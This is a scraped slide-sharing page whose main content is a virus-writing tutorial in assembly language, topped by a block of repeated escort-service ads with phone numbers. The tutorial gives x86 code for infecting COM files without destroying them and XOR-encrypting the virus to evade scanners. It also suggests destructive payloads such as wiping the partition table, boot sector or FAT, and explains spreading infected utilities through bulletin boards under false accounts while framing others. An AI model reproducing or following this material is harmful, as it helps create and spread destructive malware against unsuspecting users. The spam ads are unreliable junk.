The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
 
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
 
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
 
Java Programming :Event Handling(Types of Events)
Java Programming :Event Handling(Types of Events)Java Programming :Event Handling(Types of Events)
Java Programming :Event Handling(Types of Events)
 
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
 
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
 
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
 
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
 
Software Development Life Cycle By Team Orange (Dept. of Pharmacy)
Software Development Life Cycle By Team Orange (Dept. of Pharmacy)Software Development Life Cycle By Team Orange (Dept. of Pharmacy)
Software Development Life Cycle By Team Orange (Dept. of Pharmacy)
 
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
 
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
 
Porous Ceramics seminar and technical writing
Porous Ceramics seminar and technical writingPorous Ceramics seminar and technical writing
Porous Ceramics seminar and technical writing
 
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service NashikCall Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
 

Assembly Language Coded Virus Supri (supreme v1)

  • 2. VIRUS ARE WONDROUS CREATIONS WRITTEN FOR THE SOLE PURPOSE OF SPREADING AND DESTROYING THE SYSTEMS OF UNSUSPECTING FOOLS. THIS ELIMINATES THE SYSTEMS OF SIMPLETONS WHO CAN'T TELL THAT THERE IS A PROBLEM WHEN A 100 BYTE FILE SUDDENLY BLOSSOMS INTO A 1,000 BYTE FILE. DUH. THESE LOW-LIFES DO NOT DESERVE TO EXIST, SO IT IS OUR SACRED DUTY TO WIPE THEIR HARD DRIVES OFF THE FACE OF THE EARTH. IT IS A SIMPLE MATTER OF SPEEDING ALONG SURVIVAL OF THE FITTEST
  • 3. THERE ARE THREE TYPES OF VIRUS: 1) TINY VIRUS (UNDER 500 BYTES) WHICH ARE DESIGNED TO BE UNDETECTABLE DUE TO THEIR SMALL SIZE. TINY IS ONE SUCH VIRUS. THEY ARE GENERALLY VERY SIMPLE BECAUSE THEIR CODE LENGTH IS SO LIMITED. 2) LARGE VIRUS (OVER 1,500 BYTES) WHICH ARE DESIGNED TO BE UNDETECTABLE BECAUSE THEY COVER THEIR TRACKS VERY WELL (ALL THAT CODE DOES HAVE A USE!). THE BEST EXAMPLE OF THIS IS THE WHALE VIRUS, WHICH IS PERHAPS THE BEST 'STEALTH' VIRUS IN EXISTENCE. 3) OTHER VIRUS WHICH ARE NOT DESIGNED TO BE HIDDEN AT ALL (THE WRITERS DON'T GIVE A SHIT). THE COMMON VIRUS IS LIKE THIS. ALL OVERWRITING VIRUS ARE IN THIS CATEGORY.
  • 4. PART OF VIRUS A VIRUS MAY BE DIVIDED INTO THREE PARTS: THE REPLICATOR, THE CONCEALER, AND THE BOMB. THE REPLICATOR PART CONTROLS THE SPREAD OF THE VIRUS TO OTHER FILES, THE CONCEALER KEEPS THE VIRUS FROM BEING DETECTED, AND THE BOMB ONLY EXECUTES WHEN THE ACTIVATION CONDITIONS OF THE VIRUS (MORE ON THAT LATER) ARE SATISFIED.
  • 5. THE REPLICATOR THE JOB OF THE REPLICATOR IS TO SPREAD THE VIRUS THROUGHOUT THE SYSTEM OF THE CLOD WHO HAS CAUGHT THE VIRUS. HOW DOES IT DO THIS WITHOUT DESTROYING THE FILE IT INFECTS? THE EASIEST TYPE OF REPLICATOR INFECTS COM FILES. IT FIRST SAVES THE FIRST FEW BYTES OF THE INFECTED FILE. IT THEN COPIES A SMALL PORTION OF ITS CODE TO THE BEGINNING OF THE FILE, AND THE REST TO THE END. THE UNINFECTED FILE THE VIRUS CODE IN THE DIAGRAM, P1 IS PART 1 OF THE FILE, P2 IS PART 2 OF THE FILE, AND V1 AND V2 ARE PARTS 1 AND 2 OF THE VIRUS. NOTE THAT THE SIZE OF P1 SHOULD BE THE SAME AS THE SIZE OF V1, BUT THE SIZE OF P2 DOESN'T NECESSARILY HAVE TO BE THE SAME SIZE AS V2. THE VIRUS FIRST SAVES P1 AND COPIES IT TO THE EITHER 1) THE END OF THE FILE OR 2) INSIDE THE CODE OF THE VIRUS. LET'S ASSUME IT COPIES THE CODE TO THE END OF THE FILE. THE FILE NOW LOOKS LIKE: | P1 | P2 | | V1 | V2 | | P1 | P2 | P1 |
  • 6. THEN, THE VIRUS COPIES THE FIRST PART OF ITSELF TO THE BEGINNING OF THE FILE. FINALLY, THE VIRUS COPIES THE SECOND PART OF ITSELF TO THE END OF THE FILE. THE FINAL, INFECTED FILE LOOKS LIKE THIS: THE QUESTION IS: WHAT THE THING DO V1 AND V2 DO? V1 TRANSFERS CONTROL OF THE PROGRAM TO V2. THE CODE TO DO THIS IS SIMPLE. | V1 | P2 | P1 | | V1 | P2 | P1 | V2|
  • 7. JMP FAR PTR DUH ; TAKES FOUR BYTES DUH DW V2_START ; TAKES TWO BYTES DUH IS A FAR POINTER (SEGMENT:OFFSET) POINTING TO THE FIRST INSTRUCTION OF V2. NOTE THAT THE VALUE OF DUH MUST BE CHANGED TO REFLECT THE LENGTH OF THE FILE THAT IS INFECTED. FOR EXAMPLE, IF THE ORIGINAL SIZE OF THE PROGRAM IS 79 BYTES, DUH MUST BE CHANGED SO THAT THE INSTRUCTION AT CS:[155H] IS EXECUTED. THE VALUE OF DUH IS OBTAINED BY ADDING THE LENGTH OF V1, THE ORIGINAL SIZE OF THE INFECTED FILE, AND 256 (TO ACCOUNT FOR THE PSP). IN THIS CASE, V1 = 6 AND P1 + P2 = 79, SO 6 + 79 + 256 = 341 DECIMAL (155 HEX).
  • 8. V2 CONTAINS THE REST OF THE CODE, I.E. THE STUFF THAT DOES EVERYTHING ELSE. THE LAST PART OF V2 COPIES P1 OVER V1 (IN MEMORY, NOT ON DISK) AND THEN TRANSFERS CONTROL TO THE BEGINNING OF THE FILE (IN MEMORY). THE ORIGINAL PROGRAM WILL THEN RUN HAPPILY AS IF NOTHING HAPPENED. THE CODE TO DO THIS IS ALSO VERY SIMPLE. MOV SI, V2_START ; V2_START IS A LABEL MARKING WHERE V2 STARTS SUB SI, V1_LENGTH ; GO BACK TO WHERE P1 IS STORED MOV DI, 0100H ; ALL COM FILES ARE LOADED @ CS:[100H] IN MEMORY MOV CX, V1_LENGTH ; MOVE CX BYTES REP MOVSB ; DS:[SI] -> ES:[DI] MOV DI, 0100H JMP DI
  • 9. THIS CODE ASSUMES THAT P1 IS LOCATED JUST BEFORE V2, AS IN: P1_STORED_HERE: . . . V2_START: IT ALSO ASSUMES ES EQUALS CS. IF THESE ASSUMPTIONS ARE FALSE, CHANGE THE CODE ACCORDINGLY. HERE IS AN EXAMPLE: PUSH CS ; STORE CS POP ES ; AND MOVE IT TO ES ; NOTE MOV ES, CS IS NOT A VALID INSTRUCTION MOV SI, P1_START ; MOVE FROM WHERE EVER P1 IS STORED MOV DI, 0100H ; TO CS:[100H] MOV CX, V1_LENGTH REP MOVSB MOV DI, 0100H JMP DI
  • 10. V1_START: JMP FAR PTR DUH DUH DW V2_START V1_END: P2_START: P2_END: P1_START: ; FIRST PART OF THE PROGRAM STORED HERE FOR FUTURE USE P1_END: V2_START: ; REAL STUFF V2_END: V1_LENGTH EQU V1_END - V1_START THAT'S ALL THERE IS TO INFECTING A COM FILE WITHOUT DESTROYING IT!
  • 11. CONCEALER THIS IS THE PART WHICH CONCEALS THE PROGRAM FROM NOTICE BY THE EVERYDAY USER AND VIRUS SCANNER. THE SIMPLEST FORM OF CONCEALMENT IS THE ENCRYPTOR. THE CODE FOR A SIMPLE XOR ENCRYPTION SYSTEM FOLLOWS: ENCRYPT_VAL DB ? DECRYPT: ENCRYPT: MOV AH, ENCRYPT_VAL MOV CX, PART_TO_ENCRYPT_END - PART_TO_ENCRYPT_START MOV SI, PART_TO_ENCRYPT_START MOV DI, SI XOR_LOOP: LODSB ; DS:[SI] -> AL XOR AL, AH STOSB ; AL -> ES:[DI] LOOP XOR_LOOP RET
  • 12. NOTE THE ENCRYPTION AND DECRYPTION PROCEDURES ARE THE SAME. THIS IS DUE TO THE WEIRD NATURE OF XOR. YOU CAN CALL THESE PROCEDURES FROM ANYWHERE IN THE PROGRAM, BUT MAKE SURE YOU DO NOT CALL IT FROM A PLACE WITHIN THE AREA TO BE ENCRYPTED, AS THE PROGRAM WILL CRASH. WHEN WRITING THE VIRUS, SET THE ENCRYPTION VALUE TO 0. PART_TO_ENCRYPT_START AND PART_TO_ENCRYPT_END SANDWICH THE AREA YOU WISH TO ENCRYPT. USE A CALL DECRYPT IN THE BEGINNING OF V2 TO UNENCRYPT THE FILE SO YOUR PROGRAM CAN RUN. WHEN INFECTING A FILE, FIRST CHANGE THE ENCRYPT_VAL, THEN CALL ENCRYPT, THEN WRITE V2 TO THE END OF THE FILE, AND CALL DECRYPT. MAKE SURE THIS PART DOES NOT LIE IN THE AREA TO BE ENCRYPTED!!!
  • 13.
  • 14. THE BOMB SO NOW ALL THE BORING STUFF IS OVER. THE NASTINESS IS CONTAINED HERE. THE BOMB PART OF THE VIRUS DOES ALL THE DELETION/SLOWDOWN/ETC WHICH MAKE VIRII SO ANNOYING. SET SOME ACTIVATION CONDITIONS OF THE VIRUS. THIS CAN BE ANYTHING, RANGING FROM WHEN IT'S YOUR BIRTHDAY TO WHEN THE VIRUS HAS INFECTED 100 FILES. WHEN THESE CONDITIONS ARE MET, THEN YOUR VIRUS DOES THE GOOD STUFF. SOME SUGGESTIONS OF POSSIBLE BOMBS: 1) SYSTEM SLOWDOWN - EASILY HANDLED BY TRAPPING AN INTERRUPT AND CAUSING A DELAY WHEN IT ACTIVATES. 2) FILE DELETION - DELETE ALL ZIP FILES ON THE DRIVE. 3) MESSAGE DISPLAY - DISPLAY A NICE MESSAGE SAYING SOMETHING TO THE EFFECT OF "YOU ARE FUCKED." 4) KILLING/REPLACING THE PARTITION TABLE/BOOT SECTOR/FAT OF THE HARD DRIVE - THIS IS VERY NASTY, AS MOST DIMWITS CANNOT FIX THIS.
  • 15. OFFSET PROBLEMS THERE IS ONE CAVEAT REGARDING CALCULATION OF OFFSETS. AFTER YOU INFECT A FILE, THE LOCATIONS OF VARIABLES CHANGE. YOU MUST ACCOUNT FOR THIS. ALL RELATIVE OFFSETS CAN STAY THE SAME, BUT YOU MUST ADD THE FILE SIZE TO THE ABSOLUTE OFFSETS OR YOUR PROGRAM WILL NOT WORK. THIS IS THE MOST TRICKY PART OF WRITING VIRUS AND TAKING THESE INTO ACCOUNT CAN OFTEN GREATLY INCREASE THE SIZE OF A VIRUS. THIS IS VERY IMPORTANT AND YOU SHOULD BE SURE TO UNDERSTAND THIS BEFORE ATTEMPTING TO WRITE A NONOVERWRITING VIRUS!
  • 16. TESTING TESTING VIRII IS A DANGEROUS YET ESSENTIAL PART OF THE VIRUS CREATION PROCESS. THIS IS TO MAKE CERTAIN THAT PEOPLE *WILL* BE HIT BY THE VIRUS AND, HOPEFULLY, WIPED OUT. TEST THOROUGHLY AND MAKE SURE IT ACTIVATES UNDER THE CONDITIONS. IT WOULD BE GREAT IF EVERYONE HAD A SECOND COMPUTER TO TEST THEIR VIRII OUT, BUT, OF COURSE, THIS IS NOT THE CASE. SO IT IS ESSENTIAL THAT YOU KEEP BACKUPS OF YOUR FILES, PARTITION, BOOT RECORD, AND FAT. NORTON IS HANDY IN THIS DOING THIS. DO NOT DISREGARD THIS ADVICE (EVEN THOUGH I KNOW THAT YOU WILL ANYWAY) BECAUSE YOU WILL BE HIT BY YOUR OWN VIRII. WHEN I WROTE MY FIRST VIRUS, MY SYSTEM WAS TAKEN DOWN FOR TWO DAYS BECAUSE I DIDN'T HAVE GOOD BACKUPS. LUCKILY, THE VIRUS WAS NOT OVERLY DESTRUCTIVE. BACKUPS MAKE SENSE! LEECH A BACKUP PROGRAM FROM YOUR LOCAL PIRATE BOARD! I FIND A RAMDRIVE IS OFTEN HELPFUL IN TESTING VIRII, AS THE DAMAGE IS NOT PERMANENT. RAMDRIVES ARE ALSO USEFUL FOR TESTING TROJANS, BUT THAT IS THE TOPIC OF ANOTHER FILE...
  • 17. DISTRIBUTION THIS IS ANOTHER FUN PART OF VIRUS WRITING. IT INVOLVES SENDING YOUR BRILLIANTLY-WRITTEN PROGRAM THROUGH THE PHONE LINES TO YOUR LOCAL, UNSUSPECTING BULLETIN BOARDS. WHAT YOU SHOULD DO IS INFECT A FILE THAT ACTUALLY DOES SOMETHING (LEECH A USEFUL UTILITY FROM ANOTHER BOARD), INFECT IT, AND UPLOAD IT TO A PLACE WHERE IT WILL BE DOWNLOADED BY USERS ALL OVER. THE BEST THING IS THAT IT WON'T BE DETECTED BY PUNY SCANNER-WANNA-BES BY MCAFFEE, SINCE IT IS NEW! OH YEAH, MAKE SURE YOU ARE USING A FALSE ACCOUNT (DUH). BETTER YET, MAKE A FALSE ACCOUNT WITH THE NAME/PHONE NUMBER OF SOMEONE YOU DON'T LIKE AND UPLOAD THE INFECTED FILE UNDER THE HIS NAME. YOU CAN CALL BACK FROM TIME TO TIME AND USE A DOOR SUCH AS ZDOOR TO CHECK THE SPREAD OF THE VIRUS. THE MORE WHO DOWNLOAD, THE MORE WHO SHARE IN THE EXPERIENCE OF YOUR VIRUS!